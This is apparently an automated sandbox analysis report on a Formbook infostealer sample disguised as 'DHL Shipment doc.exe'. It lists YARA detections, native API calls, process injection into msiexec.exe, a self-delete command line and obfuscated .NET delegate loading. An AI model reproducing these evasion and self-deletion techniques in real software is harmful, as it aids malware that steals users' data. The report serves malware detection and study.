          Source: 00000000.00000002.693081041.0000000004419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.693081041.0000000004419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: DHL Shipment doc.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 3.0.DHL Shipment doc.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.DHL Shipment doc.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.DHL Shipment doc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.DHL Shipment doc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.DHL Shipment doc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.DHL Shipment doc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.DHL Shipment doc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.DHL Shipment doc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.DHL Shipment doc.exe.34817e0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
          Source: 0.2.DHL Shipment doc.exe.3431884.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
          Source: 3.0.DHL Shipment doc.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.DHL Shipment doc.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.DHL Shipment doc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.DHL Shipment doc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.DHL Shipment doc.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.DHL Shipment doc.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.804375407.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.804375407.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.689082555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.689082555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.720424753.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.720424753.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.940941423.0000000004B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.940941423.0000000004B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.688266335.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.688266335.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.799667944.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.799667944.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.693081041.0000000004419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.693081041.0000000004419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 04D0B150 appears 35 times
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_004185F0 NtCreateFile,3_2_004185F0
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_004186A0 NtReadFile,3_2_004186A0
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_00418720 NtClose,3_2_00418720
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_004187D0 NtAllocateVirtualMemory,3_2_004187D0
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_004185EA NtCreateFile,3_2_004185EA
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_00418642 NtReadFile,3_2_00418642
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_0041869A NtReadFile,3_2_0041869A
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_004187CB NtAllocateVirtualMemory,3_2_004187CB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D495D0 NtClose,LdrInitializeThunk,11_2_04D495D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49540 NtReadFile,LdrInitializeThunk,11_2_04D49540
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D496D0 NtCreateKey,LdrInitializeThunk,11_2_04D496D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D496E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_04D496E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49FE0 NtCreateMutant,LdrInitializeThunk,11_2_04D49FE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49780 NtMapViewOfSection,LdrInitializeThunk,11_2_04D49780
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49710 NtQueryInformationToken,LdrInitializeThunk,11_2_04D49710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49840 NtDelayExecution,LdrInitializeThunk,11_2_04D49840
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49860 NtQuerySystemInformation,LdrInitializeThunk,11_2_04D49860
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D499A0 NtCreateSection,LdrInitializeThunk,11_2_04D499A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_04D49910
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49A50 NtCreateFile,LdrInitializeThunk,11_2_04D49A50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D495F0 NtQueryInformationFile,11_2_04D495F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49560 NtWriteFile,11_2_04D49560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D4AD30 NtSetContextThread,11_2_04D4AD30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49520 NtWaitForSingleObject,11_2_04D49520
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49650 NtQueryValueKey,11_2_04D49650
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49670 NtQueryInformationProcess,11_2_04D49670
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49660 NtAllocateVirtualMemory,11_2_04D49660
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49610 NtEnumerateValueKey,11_2_04D49610
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D497A0 NtUnmapViewOfSection,11_2_04D497A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D4A770 NtOpenThread,11_2_04D4A770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49770 NtSetInformationFile,11_2_04D49770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49760 NtOpenProcess,11_2_04D49760
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D4A710 NtOpenProcessToken,11_2_04D4A710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49730 NtQueryVirtualMemory,11_2_04D49730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D498F0 NtReadVirtualMemory,11_2_04D498F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D498A0 NtWriteVirtualMemory,11_2_04D498A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D4B040 NtSuspendThread,11_2_04D4B040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49820 NtEnumerateKey,11_2_04D49820
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D499D0 NtCreateProcessEx,11_2_04D499D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49950 NtQueueApcThread,11_2_04D49950
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49A80 NtOpenDirectoryObject,11_2_04D49A80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49A10 NtQuerySection,11_2_04D49A10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49A00 NtProtectVirtualMemory,11_2_04D49A00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49A20 NtResumeThread,11_2_04D49A20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D4A3B0 NtGetContextThread,11_2_04D4A3B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49B00 NtSetValueKey,11_2_04D49B00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00EA85F0 NtCreateFile,11_2_00EA85F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00EA86A0 NtReadFile,11_2_00EA86A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00EA8720 NtClose,11_2_00EA8720
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00EA85EA NtCreateFile,11_2_00EA85EA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00EA869A NtReadFile,11_2_00EA869A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00EA8642 NtReadFile,11_2_00EA8642
          Source: DHL Shipment doc.exe, 00000000.00000002.692381067.0000000000F68000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStaticArrayInitTypeSize40.exe6 vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exe, 00000000.00000002.692850983.0000000003442000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSafeSerializationManager.dll: vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exe, 00000000.00000002.695973964.0000000006520000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exe, 00000000.00000002.693081041.0000000004419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exe, 00000000.00000002.692578717.0000000001570000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exe, 00000000.00000002.692831821.0000000003411000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSafeSerializationManager.dll: vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exe, 00000000.00000002.694907336.0000000005890000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSafeSerializationManager.dll: vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exe, 00000001.00000002.685838635.0000000000478000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStaticArrayInitTypeSize40.exe6 vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exe, 00000003.00000002.804951259.00000000033BF000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exe, 00000003.00000000.687871473.00000000009B8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStaticArrayInitTypeSize40.exe6 vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exe, 00000003.00000002.804229459.000000000164F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exe, 00000003.00000002.801396989.00000000014BF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exe, 00000003.00000003.788765239.00000000033B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAUTOCONV.EXEj% vs DHL Shipment doc.exe
          Source: DHL Shipment doc.exeBinary or memory string: OriginalFilenameStaticArrayInitTypeSize40.exe6 vs DHL Shipment doc.exe
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
          Source: DHL Shipment doc.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: DHL Shipment doc.exeReversingLabs: Detection: 34%
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\DHL Shipment doc.exe "C:\Users\user\Desktop\DHL Shipment doc.exe"
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess created: C:\Users\user\Desktop\DHL Shipment doc.exe C:\Users\user\Desktop\DHL Shipment doc.exe
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess created: C:\Users\user\Desktop\DHL Shipment doc.exe C:\Users\user\Desktop\DHL Shipment doc.exe
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\DHL Shipment doc.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL Shipment doc.exe.log
          Source: classification engineClassification label: mal100.troj.evad.winEXE@12/1@7/4
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2340:120:WilError_01
          Source: DHL Shipment doc.exe, mF/e4.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.0.DHL Shipment doc.exe.ee0000.0.unpack, mF/e4.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.2.DHL Shipment doc.exe.ee0000.0.unpack, mF/e4.csCryptographic APIs: 'CreateDecryptor'
          Source: 1.0.DHL Shipment doc.exe.3f0000.1.unpack, mF/e4.csCryptographic APIs: 'CreateDecryptor'
          Source: 1.0.DHL Shipment doc.exe.3f0000.0.unpack, mF/e4.csCryptographic APIs: 'CreateDecryptor'
          Source: 1.0.DHL Shipment doc.exe.3f0000.3.unpack, mF/e4.csCryptographic APIs: 'CreateDecryptor'
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: DHL Shipment doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: DHL Shipment doc.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: DHL Shipment doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: StaticArrayInitTypeSize40.pdbxD source: DHL Shipment doc.exe
          Source: Binary string: msiexec.pdb source: DHL Shipment doc.exe, 00000003.00000002.804927293.00000000033B0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: StaticArrayInitTypeSize40.pdb source: DHL Shipment doc.exe
          Source: Binary string: msiexec.pdbGCTL source: DHL Shipment doc.exe, 00000003.00000002.804927293.00000000033B0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: DHL Shipment doc.exe, 00000003.00000002.801396989.00000000014BF000.00000040.00000800.00020000.00000000.sdmp, DHL Shipment doc.exe, 00000003.00000002.799983136.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: DHL Shipment doc.exe, 00000003.00000002.801396989.00000000014BF000.00000040.00000800.00020000.00000000.sdmp, DHL Shipment doc.exe, 00000003.00000002.799983136.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: autoconv.pdb source: DHL Shipment doc.exe, 00000003.00000003.788765239.00000000033B0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: autoconv.pdbGCTL source: DHL Shipment doc.exe, 00000003.00000003.788765239.00000000033B0000.00000004.00000800.00020000.00000000.sdmp

          Data Obfuscation

          Source: DHL Shipment doc.exe, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 0.0.DHL Shipment doc.exe.ee0000.0.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 0.2.DHL Shipment doc.exe.ee0000.0.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 1.0.DHL Shipment doc.exe.3f0000.1.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 1.0.DHL Shipment doc.exe.3f0000.0.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 1.0.DHL Shipment doc.exe.3f0000.3.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 1.0.DHL Shipment doc.exe.3f0000.2.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 1.2.DHL Shipment doc.exe.3f0000.0.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 3.0.DHL Shipment doc.exe.930000.3.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 3.0.DHL Shipment doc.exe.930000.5.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 3.0.DHL Shipment doc.exe.930000.9.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 3.2.DHL Shipment doc.exe.930000.1.unpack, mF/e4.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
